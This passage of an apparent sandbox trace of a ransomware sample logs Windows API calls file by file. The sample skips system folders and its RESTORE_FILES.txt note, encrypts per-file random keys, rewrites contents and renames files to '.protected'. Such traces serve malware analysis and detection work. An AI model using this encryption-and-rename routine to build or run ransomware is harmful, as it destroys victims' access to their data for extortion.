pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\HandPrints.jpg.protected") returned 93 [0094.565] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\HandPrints.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\handprints.jpg"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\HandPrints.jpg.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\handprints.jpg.protected")) returned 1 [0094.566] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0094.566] lstrcmpiW (lpString1="Orange Circles.htm", lpString2="Windows") returned -1 [0094.566] lstrcmpiW (lpString1="Orange Circles.htm", lpString2="Program Files") returned -1 [0094.566] lstrcmpiW (lpString1="Orange Circles.htm", lpString2="Program Files (x86)") returned -1 [0094.566] lstrcmpiW (lpString1="Orange Circles.htm", lpString2="$Recycle.bin") returned 1 [0094.566] lstrcmpiW (lpString1="Orange Circles.htm", lpString2="System Volume Information") returned -1 [0094.566] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Orange Circles.htm") returned 87 [0094.566] StrStrIW (lpFirst="Orange Circles.htm", lpSrch=".protected") returned 0x0 [0094.566] lstrcmpW (lpString1="Orange Circles.htm", lpString2="RESTORE_FILES.txt") returned -1 [0094.566] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0094.567] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0094.567] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Orange Circles.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\orange circles.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0094.567] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Orange Circles.htm") returned 87 [0094.567] StrStrW (lpFirst="Orange Circles.htm", lpSrch=".txt") returned 0x0 [0094.567] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Orange Circles.htm") returned 87 [0094.567] StrStrW (lpFirst="Orange Circles.htm", lpSrch=".rar") returned 0x0 [0094.567] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Orange Circles.htm") returned 87 [0094.567] StrStrW (lpFirst="Orange Circles.htm", lpSrch=".zip") returned 0x0 [0094.567] ReadFile (in: hFile=0x150, lpBuffer=0x4f3bf8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesRead=0x295e7b4*=0xed, lpOverlapped=0x0) returned 1 [0094.568] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffff13, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.568] WriteFile (in: hFile=0x150, lpBuffer=0x4f3bf8*, nNumberOfBytesToWrite=0xed, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesWritten=0x295e7b4*=0xed, lpOverlapped=0x0) returned 1 [0094.568] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.568] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0094.568] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0094.568] CloseHandle (hObject=0x150) returned 1 [0094.568] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Orange Circles.htm.protected") returned 97 [0094.568] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Orange Circles.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\orange circles.htm"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Orange Circles.htm.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\orange circles.htm.protected")) returned 1 [0094.569] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0094.569] lstrcmpiW (lpString1="OrangeCircles.jpg", lpString2="Windows") returned -1 [0094.569] lstrcmpiW (lpString1="OrangeCircles.jpg", lpString2="Program Files") returned -1 [0094.569] lstrcmpiW (lpString1="OrangeCircles.jpg", lpString2="Program Files (x86)") returned -1 [0094.569] lstrcmpiW (lpString1="OrangeCircles.jpg", lpString2="$Recycle.bin") returned 1 [0094.569] lstrcmpiW (lpString1="OrangeCircles.jpg", lpString2="System Volume Information") returned -1 [0094.569] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\OrangeCircles.jpg") returned 86 [0094.569] StrStrIW (lpFirst="OrangeCircles.jpg", lpSrch=".protected") returned 0x0 [0094.570] lstrcmpW (lpString1="OrangeCircles.jpg", lpString2="RESTORE_FILES.txt") returned -1 [0094.570] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0094.570] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0094.570] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\OrangeCircles.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\orangecircles.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0094.571] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\OrangeCircles.jpg") returned 86 [0094.571] StrStrW (lpFirst="OrangeCircles.jpg", lpSrch=".txt") returned 0x0 [0094.571] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\OrangeCircles.jpg") returned 86 [0094.571] StrStrW (lpFirst="OrangeCircles.jpg", lpSrch=".rar") returned 0x0 [0094.571] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\OrangeCircles.jpg") returned 86 [0094.571] StrStrW (lpFirst="OrangeCircles.jpg", lpSrch=".zip") returned 0x0 [0094.572] ReadFile (in: hFile=0x150, lpBuffer=0x4f3bf8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesRead=0x295e7b4*=0x18ed, lpOverlapped=0x0) returned 1 [0094.606] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffe713, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.606] WriteFile (in: hFile=0x150, lpBuffer=0x4f3bf8*, nNumberOfBytesToWrite=0x18ed, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesWritten=0x295e7b4*=0x18ed, lpOverlapped=0x0) returned 1 [0094.606] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.606] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0094.606] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0094.606] CloseHandle (hObject=0x150) returned 1 [0094.606] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\OrangeCircles.jpg.protected") returned 96 [0094.607] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\OrangeCircles.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\orangecircles.jpg"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\OrangeCircles.jpg.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\orangecircles.jpg.protected")) returned 1 [0094.607] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0094.607] lstrcmpiW (lpString1="Peacock.htm", lpString2="Windows") returned -1 [0094.607] lstrcmpiW (lpString1="Peacock.htm", lpString2="Program Files") returned -1 [0094.607] lstrcmpiW (lpString1="Peacock.htm", lpString2="Program Files (x86)") returned -1 [0094.607] lstrcmpiW (lpString1="Peacock.htm", lpString2="$Recycle.bin") returned 1 [0094.608] lstrcmpiW (lpString1="Peacock.htm", lpString2="System Volume Information") returned -1 [0094.608] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.htm") returned 80 [0094.608] StrStrIW (lpFirst="Peacock.htm", lpSrch=".protected") returned 0x0 [0094.608] lstrcmpW (lpString1="Peacock.htm", lpString2="RESTORE_FILES.txt") returned -1 [0094.608] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0094.608] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0094.608] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\peacock.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0094.608] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.htm") returned 80 [0094.608] StrStrW (lpFirst="Peacock.htm", lpSrch=".txt") returned 0x0 [0094.608] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.htm") returned 80 [0094.608] StrStrW (lpFirst="Peacock.htm", lpSrch=".rar") returned 0x0 [0094.608] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.htm") returned 80 [0094.608] StrStrW (lpFirst="Peacock.htm", lpSrch=".zip") returned 0x0 [0094.608] ReadFile (in: hFile=0x150, lpBuffer=0x4f3bf8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesRead=0x295e7b4*=0xe8, lpOverlapped=0x0) returned 1 [0094.609] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffff18, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.609] WriteFile (in: hFile=0x150, lpBuffer=0x4f3bf8*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesWritten=0x295e7b4*=0xe8, lpOverlapped=0x0) returned 1 [0094.609] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.610] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0094.610] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0094.610] CloseHandle (hObject=0x150) returned 1 [0094.610] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.htm.protected") returned 90 [0094.610] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\peacock.htm"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.htm.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\peacock.htm.protected")) returned 1 [0094.610] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0094.611] lstrcmpiW (lpString1="Peacock.jpg", lpString2="Windows") returned -1 [0094.611] lstrcmpiW (lpString1="Peacock.jpg", lpString2="Program Files") returned -1 [0094.611] lstrcmpiW (lpString1="Peacock.jpg", lpString2="Program Files (x86)") returned -1 [0094.611] lstrcmpiW (lpString1="Peacock.jpg", lpString2="$Recycle.bin") returned 1 [0094.611] lstrcmpiW (lpString1="Peacock.jpg", lpString2="System Volume Information") returned -1 [0094.611] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.jpg") returned 80 [0094.611] StrStrIW (lpFirst="Peacock.jpg", lpSrch=".protected") returned 0x0 [0094.611] lstrcmpW (lpString1="Peacock.jpg", lpString2="RESTORE_FILES.txt") returned -1 [0094.611] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0094.611] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0094.611] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\peacock.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0094.611] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.jpg") returned 80 [0094.611] StrStrW (lpFirst="Peacock.jpg", lpSrch=".txt") returned 0x0 [0094.611] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.jpg") returned 80 [0094.611] StrStrW (lpFirst="Peacock.jpg", lpSrch=".rar") returned 0x0 [0094.611] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.jpg") returned 80 [0094.611] StrStrW (lpFirst="Peacock.jpg", lpSrch=".zip") returned 0x0 [0094.611] ReadFile (in: hFile=0x150, lpBuffer=0x4f3bf8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesRead=0x295e7b4*=0x13fb, lpOverlapped=0x0) returned 1 [0094.613] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffec05, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.613] WriteFile (in: hFile=0x150, lpBuffer=0x4f3bf8*, nNumberOfBytesToWrite=0x13fb, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesWritten=0x295e7b4*=0x13fb, lpOverlapped=0x0) returned 1 [0094.613] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.614] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0094.614] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0094.614] CloseHandle (hObject=0x150) returned 1 [0094.614] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.jpg.protected") returned 90 [0094.614] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\peacock.jpg"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.jpg.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\peacock.jpg.protected")) returned 1 [0094.614] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0094.614] lstrcmpiW (lpString1="Roses.htm", lpString2="Windows") returned -1 [0094.615] lstrcmpiW (lpString1="Roses.htm", lpString2="Program Files") returned 1 [0094.615] lstrcmpiW (lpString1="Roses.htm", lpString2="Program Files (x86)") returned 1 [0094.615] lstrcmpiW (lpString1="Roses.htm", lpString2="$Recycle.bin") returned 1 [0094.615] lstrcmpiW (lpString1="Roses.htm", lpString2="System Volume Information") returned -1 [0094.615] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.htm") returned 78 [0094.615] StrStrIW (lpFirst="Roses.htm", lpSrch=".protected") returned 0x0 [0094.615] lstrcmpW (lpString1="Roses.htm", lpString2="RESTORE_FILES.txt") returned 1 [0094.615] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0094.615] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0094.615] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\roses.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0094.615] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.htm") returned 78 [0094.615] StrStrW (lpFirst="Roses.htm", lpSrch=".txt") returned 0x0 [0094.615] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.htm") returned 78 [0094.615] StrStrW (lpFirst="Roses.htm", lpSrch=".rar") returned 0x0 [0094.615] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.htm") returned 78 [0094.615] StrStrW (lpFirst="Roses.htm", lpSrch=".zip") returned 0x0 [0094.615] ReadFile (in: hFile=0x150, lpBuffer=0x4f3bf8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesRead=0x295e7b4*=0xe9, lpOverlapped=0x0) returned 1 [0094.616] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffff17, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.616] WriteFile (in: hFile=0x150, lpBuffer=0x4f3bf8*, nNumberOfBytesToWrite=0xe9, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesWritten=0x295e7b4*=0xe9, lpOverlapped=0x0) returned 1 [0094.616] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.617] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0094.617] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0094.617] CloseHandle (hObject=0x150) returned 1 [0094.617] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.htm.protected") returned 88 [0094.617] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\roses.htm"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.htm.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\roses.htm.protected")) returned 1 [0094.618] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0094.618] lstrcmpiW (lpString1="Roses.jpg", lpString2="Windows") returned -1 [0094.618] lstrcmpiW (lpString1="Roses.jpg", lpString2="Program Files") returned 1 [0094.618] lstrcmpiW (lpString1="Roses.jpg", lpString2="Program Files (x86)") returned 1 [0094.618] lstrcmpiW (lpString1="Roses.jpg", lpString2="$Recycle.bin") returned 1 [0094.618] lstrcmpiW (lpString1="Roses.jpg", lpString2="System Volume Information") returned -1 [0094.618] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.jpg") returned 78 [0094.618] StrStrIW (lpFirst="Roses.jpg", lpSrch=".protected") returned 0x0 [0094.618] lstrcmpW (lpString1="Roses.jpg", lpString2="RESTORE_FILES.txt") returned 1 [0094.618] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0094.618] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0094.618] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\roses.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0094.618] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.jpg") returned 78 [0094.618] StrStrW (lpFirst="Roses.jpg", lpSrch=".txt") returned 0x0 [0094.619] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.jpg") returned 78 [0094.619] StrStrW (lpFirst="Roses.jpg", lpSrch=".rar") returned 0x0 [0094.619] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.jpg") returned 78 [0094.619] StrStrW (lpFirst="Roses.jpg", lpSrch=".zip") returned 0x0 [0094.619] ReadFile (in: hFile=0x150, lpBuffer=0x4f3bf8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesRead=0x295e7b4*=0x780, lpOverlapped=0x0) returned 1 [0094.621] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffff880, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.621] WriteFile (in: hFile=0x150, lpBuffer=0x4f3bf8*, nNumberOfBytesToWrite=0x780, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesWritten=0x295e7b4*=0x780, lpOverlapped=0x0) returned 1 [0094.621] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.621] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0094.621] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, 